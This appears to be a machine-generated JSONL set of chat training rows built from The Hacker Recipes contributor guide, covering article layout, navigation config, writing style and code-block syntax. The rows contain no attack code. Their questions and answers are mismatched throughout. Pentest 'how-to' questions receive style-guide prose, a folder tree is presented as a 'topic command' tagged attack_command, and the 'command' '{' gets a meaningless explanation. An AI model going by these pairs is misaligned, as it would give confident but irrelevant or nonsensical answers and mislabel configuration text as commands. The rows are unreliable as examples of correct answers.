"Variables", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Variables - Resetting variables"}, {"role": "assistant", "content": "All saved variables automatically expire after 24 hours. If you need to reset them before that, click the button below:\n\n\n\n\n\n"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Variables - Resetting variables", "response": "All saved variables automatically expire after 24 hours. If you need to reset them before that, click the button below:\n\n\n\n\n\n", "metadata": {"corpus_index": 1324, "category": "credentials", "source_file": "docs/src/contributing/variables.md", "page_title": "Variables", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Guide for authors 📝"}, {"role": "assistant", "content": "The Hacker Recipes is a community-driven project, and we welcome contributions from anyone who wants to share their knowledge and help others learn.\nIn order to keep the quality of the content high, in terms of readability and structure, we ask contributors to follow a consistent structure and best practices when writing articles.\n\nThis guide outlines the typical structure, file organization, and best practices for writing articles that align with the project's standards."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Guide for authors 📝", "response": "The Hacker Recipes is a community-driven project, and we welcome contributions from anyone who wants to share their knowledge and help others learn.\nIn order to keep the quality of the content high, in terms of readability and structure, we ask contributors to follow a consistent structure and best practices when writing articles.\n\nThis guide outlines the typical structure, file organization, and best practices for writing articles that align with the project's standards.", "metadata": {"corpus_index": 1325, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Guide for authors 📝 during a pentest?"}, {"role": "assistant", "content": "The Hacker Recipes is a community-driven project, and we welcome contributions from anyone who wants to share their knowledge and help others learn.\nIn order to keep the quality of the content high, in terms of readability and structure, we ask contributors to follow a consistent structure and best practices when writing articles.\n\nThis guide outlines the typical structure, file organization, and best practices for writing articles that align with the project's standards."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Guide for authors 📝 during a pentest?", "response": "The Hacker Recipes is a community-driven project, and we welcome contributions from anyone who wants to share their knowledge and help others learn.\nIn order to keep the quality of the content high, in terms of readability and structure, we ask contributors to follow a consistent structure and best practices when writing articles.\n\nThis guide outlines the typical structure, file organization, and best practices for writing articles that align with the project's standards.", "metadata": {"corpus_index": 1325, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Guide for authors 📝 - Files and folders?"}, {"role": "assistant", "content": "All articles are stored in the /docs/src folder. \n\n::: tabs\n\n=== Article without images\n\nIf the article doesn't include images (or other assets), it should be a markdown file with the .md extension, and named after the topic it covers.\n\n=== Article with images\n\nIf the article includes images (or other media), the article should be named index.md and placed in a directory named after the topic it covers.\nThe assets should be stored in a subdirectory named assets, and referenced in the article using the ![](assets/image.png) syntax.\n``\ntopic\n├── assets\n│   ├── image1.png\n│   ├── image2.png\n└── index.md\n``\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Guide for authors 📝 - Files and folders?", "response": "All articles are stored in the /docs/src folder. \n\n::: tabs\n\n=== Article without images\n\nIf the article doesn't include images (or other assets), it should be a markdown file with the .md extension, and named after the topic it covers.\n\n=== Article with images\n\nIf the article includes images (or other media), the article should be named index.md and placed in a directory named after the topic it covers.\nThe assets should be stored in a subdirectory named assets, and referenced in the article using the ![](assets/image.png) syntax.\n``\ntopic\n├── assets\n│   ├── image1.png\n│   ├── image2.png\n└── index.md\n``\n:::", "metadata": {"corpus_index": 1326, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Guide for authors 📝 - Files and folders?"}, {"role": "assistant", "content": "All articles are stored in the /docs/src folder. \n\n::: tabs\n\n=== Article without images\n\nIf the article doesn't include images (or other assets), it should be a markdown file with the .md extension, and named after the topic it covers.\n\n=== Article with images\n\nIf the article includes images (or other media), the article should be named index.md and placed in a directory named after the topic it covers.\nThe assets should be stored in a subdirectory named assets, and referenced in the article using the ![](assets/image.png) syntax.\n``\ntopic\n├── assets\n│   ├── image1.png\n│   ├── image2.png\n└── index.md\n``\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Guide for authors 📝 - Files and folders?", "response": "All articles are stored in the /docs/src folder. \n\n::: tabs\n\n=== Article without images\n\nIf the article doesn't include images (or other assets), it should be a markdown file with the .md extension, and named after the topic it covers.\n\n=== Article with images\n\nIf the article includes images (or other media), the article should be named index.md and placed in a directory named after the topic it covers.\nThe assets should be stored in a subdirectory named assets, and referenced in the article using the ![](assets/image.png) syntax.\n``\ntopic\n├── assets\n│   ├── image1.png\n│   ├── image2.png\n└── index.md\n``\n:::", "metadata": {"corpus_index": 1326, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the topic command for guide for authors 📝 - files and folders"}, {"role": "assistant", "content": "topic\n├── assets\n│   ├── image1.png\n│   ├── image2.png\n└── index.md"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the topic command for guide for authors 📝 - files and folders", "response": "topic\n├── assets\n│   ├── image1.png\n│   ├── image2.png\n└── index.md", "metadata": {"corpus_index": 1327, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "topic"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Guide for authors 📝 - Files and folders"}, {"role": "assistant", "content": "topic\n├── assets\n│   ├── image1.png\n│   ├── image2.png\n└── index.md"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Guide for authors 📝 - Files and folders", "response": "topic\n├── assets\n│   ├── image1.png\n│   ├── image2.png\n└── index.md", "metadata": {"corpus_index": 1327, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `topic`?"}, {"role": "assistant", "content": "This command is used for guide for authors 📝 - files and folders. Files and folders"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `topic`?", "response": "This command is used for guide for authors 📝 - files and folders. Files and folders", "metadata": {"corpus_index": 1327, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Guide for authors 📝 - Navigation panel in the context of penetration testing"}, {"role": "assistant", "content": "For the article to be included in the navigation panel, it should be added to the config.mts file, in the sidebar array, with the following structure:\n\n``typescript\n{\n \"text\": 'Category',\n \"items\": [\n {\n \"text\": 'Article without images',\n \"link\": '/.../category/topic.md',\n },\n {\n \"text\": 'Article with images',\n \"link\": '/.../category/topic/index.md',\n }\n ]\n}\n`\n\nA category can be a container for articles, and/or be a container for other categories, and include (or not) an index.md file to provide a brief introduction to the category. For the latter, the structure goes like this:\n\n`typescript\n{\n \"text\": 'Category',\n \"link\": '/.../index.md' \n \"items\": [\n// ...\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Guide for authors 📝 - Navigation panel in the context of penetration testing", "response": "For the article to be included in the navigation panel, it should be added to the config.mts file, in the sidebar array, with the following structure:\n\n``typescript\n{\n \"text\": 'Category',\n \"items\": [\n {\n \"text\": 'Article without images',\n \"link\": '/.../category/topic.md',\n },\n {\n \"text\": 'Article with images',\n \"link\": '/.../category/topic/index.md',\n }\n ]\n}\n`\n\nA category can be a container for articles, and/or be a container for other categories, and include (or not) an index.md file to provide a brief introduction to the category. For the latter, the structure goes like this:\n\n`typescript\n{\n \"text\": 'Category',\n \"link\": '/.../index.md' \n \"items\": [\n// ...\n``", "metadata": {"corpus_index": 1328, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Guide for authors 📝 - Navigation panel"}, {"role": "assistant", "content": "For the article to be included in the navigation panel, it should be added to the config.mts file, in the sidebar array, with the following structure:\n\n``typescript\n{\n \"text\": 'Category',\n \"items\": [\n {\n \"text\": 'Article without images',\n \"link\": '/.../category/topic.md',\n },\n {\n \"text\": 'Article with images',\n \"link\": '/.../category/topic/index.md',\n }\n ]\n}\n`\n\nA category can be a container for articles, and/or be a container for other categories, and include (or not) an index.md file to provide a brief introduction to the category. For the latter, the structure goes like this:\n\n`typescript\n{\n \"text\": 'Category',\n \"link\": '/.../index.md' \n \"items\": [\n// ...\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Guide for authors 📝 - Navigation panel", "response": "For the article to be included in the navigation panel, it should be added to the config.mts file, in the sidebar array, with the following structure:\n\n``typescript\n{\n \"text\": 'Category',\n \"items\": [\n {\n \"text\": 'Article without images',\n \"link\": '/.../category/topic.md',\n },\n {\n \"text\": 'Article with images',\n \"link\": '/.../category/topic/index.md',\n }\n ]\n}\n`\n\nA category can be a container for articles, and/or be a container for other categories, and include (or not) an index.md file to provide a brief introduction to the category. For the latter, the structure goes like this:\n\n`typescript\n{\n \"text\": 'Category',\n \"link\": '/.../index.md' \n \"items\": [\n// ...\n``", "metadata": {"corpus_index": 1328, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Guide for authors 📝 - Navigation panel?"}, {"role": "assistant", "content": "{\n \"text\": 'Category',\n \"items\": [\n {\n \"text\": 'Article without images',\n \"link\": '/.../category/topic.md',\n },\n {\n \"text\": 'Article with images',\n \"link\": '/.../category/topic/index.md',\n }\n ]\n}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Guide for authors 📝 - Navigation panel?", "response": "{\n \"text\": 'Category',\n \"items\": [\n {\n \"text\": 'Article without images',\n \"link\": '/.../category/topic.md',\n },\n {\n \"text\": 'Article with images',\n \"link\": '/.../category/topic/index.md',\n }\n ]\n}", "metadata": {"corpus_index": 1329, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `{`?"}, {"role": "assistant", "content": "This command is used for guide for authors 📝 - navigation panel. Navigation panel"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `{`?", "response": "This command is used for guide for authors 📝 - navigation panel. Navigation panel", "metadata": {"corpus_index": 1329, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Guide for authors 📝 - Navigation panel"}, {"role": "assistant", "content": "{\n \"text\": 'Category',\n \"link\": '/.../index.md' \n \"items\": [\n// ..."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Guide for authors 📝 - Navigation panel", "response": "{\n \"text\": 'Category',\n \"link\": '/.../index.md' \n \"items\": [\n// ...", "metadata": {"corpus_index": 1330, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `{`?"}, {"role": "assistant", "content": "This command is used for guide for authors 📝 - navigation panel. Navigation panel"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `{`?", "response": "This command is used for guide for authors 📝 - navigation panel. Navigation panel", "metadata": {"corpus_index": 1330, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Guide for authors 📝 - Content structure"}, {"role": "assistant", "content": "A typical article in this project follows a three-part structure:\n\n1. Theory: provides an introduction to the topic, adds context, explains the concepts and ideas behind it.\n2. Practice: delves into the practical aspects: step-by-step explanations and examples, with commands and code snippets. This part should include, whenever possible, a tabs block with one tab for Unix-like commands, and another for Windows commands.\n3. Resources: lists the sources that helped build the article, and additional resources that one can use to further their learning (e.g. articles, blogposts, whitepapers, videos)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Guide for authors 📝 - Content structure", "response": "A typical article in this project follows a three-part structure:\n\n1. Theory: provides an introduction to the topic, adds context, explains the concepts and ideas behind it.\n2. Practice: delves into the practical aspects: step-by-step explanations and examples, with commands and code snippets. This part should include, whenever possible, a tabs block with one tab for Unix-like commands, and another for Windows commands.\n3. Resources: lists the sources that helped build the article, and additional resources that one can use to further their learning (e.g. articles, blogposts, whitepapers, videos)", "metadata": {"corpus_index": 1331, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Guide for authors 📝 - Content structure"}, {"role": "assistant", "content": "A typical article in this project follows a three-part structure:\n\n1. Theory: provides an introduction to the topic, adds context, explains the concepts and ideas behind it.\n2. Practice: delves into the practical aspects: step-by-step explanations and examples, with commands and code snippets. This part should include, whenever possible, a tabs block with one tab for Unix-like commands, and another for Windows commands.\n3. Resources: lists the sources that helped build the article, and additional resources that one can use to further their learning (e.g. articles, blogposts, whitepapers, videos)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Guide for authors 📝 - Content structure", "response": "A typical article in this project follows a three-part structure:\n\n1. Theory: provides an introduction to the topic, adds context, explains the concepts and ideas behind it.\n2. Practice: delves into the practical aspects: step-by-step explanations and examples, with commands and code snippets. This part should include, whenever possible, a tabs block with one tab for Unix-like commands, and another for Windows commands.\n3. Resources: lists the sources that helped build the article, and additional resources that one can use to further their learning (e.g. articles, blogposts, whitepapers, videos)", "metadata": {"corpus_index": 1331, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Guide for authors 📝 - Writing style"}, {"role": "assistant", "content": "When writing your article, one should keep the following tone & voice.\n\n* Professional and Authoritative: The content should maintain a professional tone, suitable for a technical audience familiar with cybersecurity concepts.\n* Instructional and Informative: The writing aims to educate the reader, with clear instructions and explanations. It avoids being overly casual, focusing instead on delivering detailed, technical knowledge.\n* Impersonal and Objective: The writing should avoid directly addressing the reader (e.g., “you\") or using personal pronouns. Instead, use passive constructions or neutral phrasing (e.g., “The attack can be conducted using tool XYZ\" rather than “You can conduct the attack with tool XYZ\").\n\n> [!WARNING] Examples to avoid\n> * \"This attack is super easy to pull off!\" → \"This attack is straightforward to execute.\"\n> * \"Here’s a cool trick you can use to bypass the firewall\" → \"A technique to bypass the firewall involves…\"\n> * \"Just try running this command and see what happens\" → \"Run this command to observe its effect.\"\n> * \"Don’t forget to check the logs!\" → \"Ensure that the logs are reviewed.\"\n> * \"You can conduct the attack with tool XYZ\" → \"The attack can be conducted with tool XYZ\"\n> * \"We recommend using tool ABC for this process\" → \"Tool ABC is recommended for this process\"\n> * \"First, you should verify the configuration settings\" → \"The configuration settings should first be verified\"\n\n> [!TIP]\n> ChatGPT (or similar LLM agents) can be used to review content before creating a Pull Request :wink: Below is an example prompt.\n> > \"Please proofread the following text for tone, voice, and style consistency based on these guidelines: professional, instructional, and impersonal. Highlight any instances where casual language, direct address (e.g., 'you'), or personal pronouns are used, and suggest revisions. Here is the text: [insert your content].\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Guide for authors 📝 - Writing style", "response": "When writing your article, one should keep the following tone & voice.\n\n* Professional and Authoritative: The content should maintain a professional tone, suitable for a technical audience familiar with cybersecurity concepts.\n* Instructional and Informative: The writing aims to educate the reader, with clear instructions and explanations. It avoids being overly casual, focusing instead on delivering detailed, technical knowledge.\n* Impersonal and Objective: The writing should avoid directly addressing the reader (e.g., “you\") or using personal pronouns. Instead, use passive constructions or neutral phrasing (e.g., “The attack can be conducted using tool XYZ\" rather than “You can conduct the attack with tool XYZ\").\n\n> [!WARNING] Examples to avoid\n> * \"This attack is super easy to pull off!\" → \"This attack is straightforward to execute.\"\n> * \"Here’s a cool trick you can use to bypass the firewall\" → \"A technique to bypass the firewall involves…\"\n> * \"Just try running this command and see what happens\" → \"Run this command to observe its effect.\"\n> * \"Don’t forget to check the logs!\" → \"Ensure that the logs are reviewed.\"\n> * \"You can conduct the attack with tool XYZ\" → \"The attack can be conducted with tool XYZ\"\n> * \"We recommend using tool ABC for this process\" → \"Tool ABC is recommended for this process\"\n> * \"First, you should verify the configuration settings\" → \"The configuration settings should first be verified\"\n\n> [!TIP]\n> ChatGPT (or similar LLM agents) can be used to review content before creating a Pull Request :wink: Below is an example prompt.\n> > \"Please proofread the following text for tone, voice, and style consistency based on these guidelines: professional, instructional, and impersonal. Highlight any instances where casual language, direct address (e.g., 'you'), or personal pronouns are used, and suggest revisions. Here is the text: [insert your content].\"", "metadata": {"corpus_index": 1332, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Guide for authors 📝 - Writing style during a pentest?"}, {"role": "assistant", "content": "When writing your article, one should keep the following tone & voice.\n\n* Professional and Authoritative: The content should maintain a professional tone, suitable for a technical audience familiar with cybersecurity concepts.\n* Instructional and Informative: The writing aims to educate the reader, with clear instructions and explanations. It avoids being overly casual, focusing instead on delivering detailed, technical knowledge.\n* Impersonal and Objective: The writing should avoid directly addressing the reader (e.g., “you\") or using personal pronouns. Instead, use passive constructions or neutral phrasing (e.g., “The attack can be conducted using tool XYZ\" rather than “You can conduct the attack with tool XYZ\").\n\n> [!WARNING] Examples to avoid\n> * \"This attack is super easy to pull off!\" → \"This attack is straightforward to execute.\"\n> * \"Here’s a cool trick you can use to bypass the firewall\" → \"A technique to bypass the firewall involves…\"\n> * \"Just try running this command and see what happens\" → \"Run this command to observe its effect.\"\n> * \"Don’t forget to check the logs!\" → \"Ensure that the logs are reviewed.\"\n> * \"You can conduct the attack with tool XYZ\" → \"The attack can be conducted with tool XYZ\"\n> * \"We recommend using tool ABC for this process\" → \"Tool ABC is recommended for this process\"\n> * \"First, you should verify the configuration settings\" → \"The configuration settings should first be verified\"\n\n> [!TIP]\n> ChatGPT (or similar LLM agents) can be used to review content before creating a Pull Request :wink: Below is an example prompt.\n> > \"Please proofread the following text for tone, voice, and style consistency based on these guidelines: professional, instructional, and impersonal. Highlight any instances where casual language, direct address (e.g., 'you'), or personal pronouns are used, and suggest revisions. Here is the text: [insert your content].\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Guide for authors 📝 - Writing style during a pentest?", "response": "When writing your article, one should keep the following tone & voice.\n\n* Professional and Authoritative: The content should maintain a professional tone, suitable for a technical audience familiar with cybersecurity concepts.\n* Instructional and Informative: The writing aims to educate the reader, with clear instructions and explanations. It avoids being overly casual, focusing instead on delivering detailed, technical knowledge.\n* Impersonal and Objective: The writing should avoid directly addressing the reader (e.g., “you\") or using personal pronouns. Instead, use passive constructions or neutral phrasing (e.g., “The attack can be conducted using tool XYZ\" rather than “You can conduct the attack with tool XYZ\").\n\n> [!WARNING] Examples to avoid\n> * \"This attack is super easy to pull off!\" → \"This attack is straightforward to execute.\"\n> * \"Here’s a cool trick you can use to bypass the firewall\" → \"A technique to bypass the firewall involves…\"\n> * \"Just try running this command and see what happens\" → \"Run this command to observe its effect.\"\n> * \"Don’t forget to check the logs!\" → \"Ensure that the logs are reviewed.\"\n> * \"You can conduct the attack with tool XYZ\" → \"The attack can be conducted with tool XYZ\"\n> * \"We recommend using tool ABC for this process\" → \"Tool ABC is recommended for this process\"\n> * \"First, you should verify the configuration settings\" → \"The configuration settings should first be verified\"\n\n> [!TIP]\n> ChatGPT (or similar LLM agents) can be used to review content before creating a Pull Request :wink: Below is an example prompt.\n> > \"Please proofread the following text for tone, voice, and style consistency based on these guidelines: professional, instructional, and impersonal. Highlight any instances where casual language, direct address (e.g., 'you'), or personal pronouns are used, and suggest revisions. Here is the text: [insert your content].\"", "metadata": {"corpus_index": 1332, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Guide for authors 📝 - Block Types?"}, {"role": "assistant", "content": "The project uses a variety of block types to organize and present content.\nWhile this guide focuses on the main blocks used in this project, additionnal blocks are listed in the official VitePress docs."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Guide for authors 📝 - Block Types?", "response": "The project uses a variety of block types to organize and present content.\nWhile this guide focuses on the main blocks used in this project, additionnal blocks are listed in the official VitePress docs.", "metadata": {"corpus_index": 1333, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Guide for authors 📝 - Block Types?"}, {"role": "assistant", "content": "The project uses a variety of block types to organize and present content.\nWhile this guide focuses on the main blocks used in this project, additionnal blocks are listed in the official VitePress docs."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Guide for authors 📝 - Block Types?", "response": "The project uses a variety of block types to organize and present content.\nWhile this guide focuses on the main blocks used in this project, additionnal blocks are listed in the official VitePress docs.", "metadata": {"corpus_index": 1333, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Guide for authors 📝 - Code in the context of penetration testing"}, {"role": "assistant", "content": "Use triple backticks to delimit code blocks, specifying the language after the first set of backticks.\nVitePress supports extended usage of code blocks such as syntax highlighting, line highlighting, line focus, colored diffs, errors and warnings highlighting, line numbers, code groups. \n\nBut it can be as simple as that:\n\n```\n`python\nprint('hello world')\n`\n``\n\nGiving the following output\n\n`python\nprint('hello world')\n``\n\n---"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Guide for authors 📝 - Code in the context of penetration testing", "response": "Use triple backticks to delimit code blocks, specifying the language after the first set of backticks.\nVitePress supports extended usage of code blocks such as syntax highlighting, line highlighting, line focus, colored diffs, errors and warnings highlighting, line numbers, code groups. \n\nBut it can be as simple as that:\n\n```\n`python\nprint('hello world')\n`\n``\n\nGiving the following output\n\n`python\nprint('hello world')\n``\n\n---", "metadata": {"corpus_index": 1334, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Guide for authors 📝 - Code?"}, {"role": "assistant", "content": "Use triple backticks to delimit code blocks, specifying the language after the first set of backticks.\nVitePress supports extended usage of code blocks such as syntax highlighting, line highlighting, line focus, colored diffs, errors and warnings highlighting, line numbers, code groups. \n\nBut it can be as simple as that:\n\n```\n`python\nprint('hello world')\n`\n``\n\nGiving the following output\n\n`python\nprint('hello world')\n``\n\n---"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Guide for authors 📝 - Code?", "response": "Use triple backticks to delimit code blocks, specifying the language after the first set of backticks.\nVitePress supports extended usage of code blocks such as syntax highlighting, line highlighting, line focus, colored diffs, errors and warnings highlighting, line 